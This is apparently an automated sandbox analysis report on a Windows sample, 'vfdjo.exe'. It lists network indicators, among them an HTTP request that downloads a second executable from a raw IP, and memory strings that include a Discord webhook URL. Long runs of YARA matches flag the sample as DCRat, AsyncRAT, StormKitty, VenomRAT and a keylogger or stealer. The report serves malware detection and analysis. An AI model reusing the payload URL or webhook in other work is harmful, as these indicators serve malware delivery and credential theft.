00 02 00 00 00 da 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e8 2f 00 00 00 00 00 48 00 00 00 02 00 05 00 18 00 14 00 58 e8 1b 00 01 00 00 00 c5 08 00 06 18 47 12 00 fe b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c c3 df 8f 3c 11 bd ff 34 87 b1 23 14 56 06 77 83 64 21 f6 ae ea 92 48 41 5a d4 f4 e9 cb 91 b0 af f6 49 f6 31 fe 0b 17 da cb 0b c6 59 cd b0 54 38 44 e3 bf 63 5b db 81 ef 32 94 82 dc bc a4 15 ec 6e 6a 6c 4f ca 73 5d 79 78 af 3c 8f 6d 74 38 2a ad 8e 04 fd f1 d9 42 ea a1 c0 ca 2d 1d 1e 72 49 18 a3 ca 67 a3 fa 83 3a fe 6d c8 00 65 80 c0 b1 cd 1f 89 87 cf a0 e4 6a 7b 55 6d 37 ff 10 39 99 3b 0d 11 ce 24 89 51 57 a9 9a d9 1e d7 41 41 30 56 30 79 d5 68 60 34 62 45 eb b4 89 3d f7 f7 b8 57 00 07 80 c2 18 00 be 4d 9a 26 2c 91 ed 43 ae 09 85 03 3a f6 5d 29 17 23 eb cb 6c ab 41 47 38 e9 42 0d ca 33 4f 29 3b 81 c3 22 e3 f2 4c ad 22 f7 8c 70 ee f5 a1 3c 31 7f 39 3b e3 59 46 98 20 f2 38 66 ea 4b 3f 12 e4 df 04 93 83 92 d6 9e 57 45 77 e8 3a c3 37 69 28 7d 08 d2 97 f4 6a 59 b3 32 a6 5d 75 7b e8 14 ac f8 91 31 43 fd e8 ad 72 7f fc a1 db 68 a8 fe 3a bf 62 e4 a1 05 9f af 76 4a fb 0a d0 aa c3 01 8b a1 6e db ab 11

Source: global traffic

HTTP traffic detected: GET /infopage/yijth.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 147.45.44.131 147.45.44.131

Source: Joe Sandbox View

ASN Name: FCNUniversityPublicCorporationOsakaJP FCNUniversityPublicCorporationOsakaJP

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131

Source: global traffic

HTTP traffic detected: GET /infopage/yijth.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive

Source: vfdjo.exe, 00000000.00000002.1721393679.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721393679.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131
Source: vfdjo.exe, 00000000.00000002.1721393679.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000001.00000003.1686491874.0000000004DF4000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000001.00000003.1686610494.0000000004DF4000.00000004.00000020.00020000.00000000.sdmp, lvbdqmie.0.cs.0.dr	String found in binary or memory: http://147.45.44.131/infopage/yijth.exe
Source: csc.exe, 00000001.00000003.1687233660.0000000004CB1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/yijth.exe0
Source: vfdjo.exe, 00000000.00000002.1723757668.00000000050D0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000001.00000003.1686756542.0000000004DE4000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000001.00000003.1686578450.0000000004DE3000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000001.00000002.1688333242.0000000004DE4000.00000004.00000020.00020000.00000000.sdmp, lvbdqmie.dll.1.dr	String found in binary or memory: http://147.45.44.131/infopage/yijth.exe_2
Source: vfdjo.exe, 00000000.00000002.1721393679.0000000002C90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.448
Source: RegAsm.exe, 00000004.00000002.4158509503.0000000005590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegAsm.exe, 00000004.00000002.4158509503.00000000055BC000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io/ip
Source: RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: vfdjo.exe, 00000000.00000002.1721393679.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4148154004.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
Source: RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v6/users/
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721393679.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721393679.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354cIt
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_seeaCould

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Keylogger Generic

Source: Yara match	File source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

Yara detected VenomRAT

Source: Yara match	File source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

E-Banking Fraud

Yara detected AveMaria stealer

Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: dump.pcap, type: PCAP	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.vfdjo.exe.2c994c2.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.vfdjo.exe.2c9c510.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.vfdjo.exe.2c2a79e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.vfdjo.exe.2c2d204.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.vfdjo.exe.2c994c2.3.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.vfdjo.exe.2c2d204.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.vfdjo.exe.2c2a79e.1.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
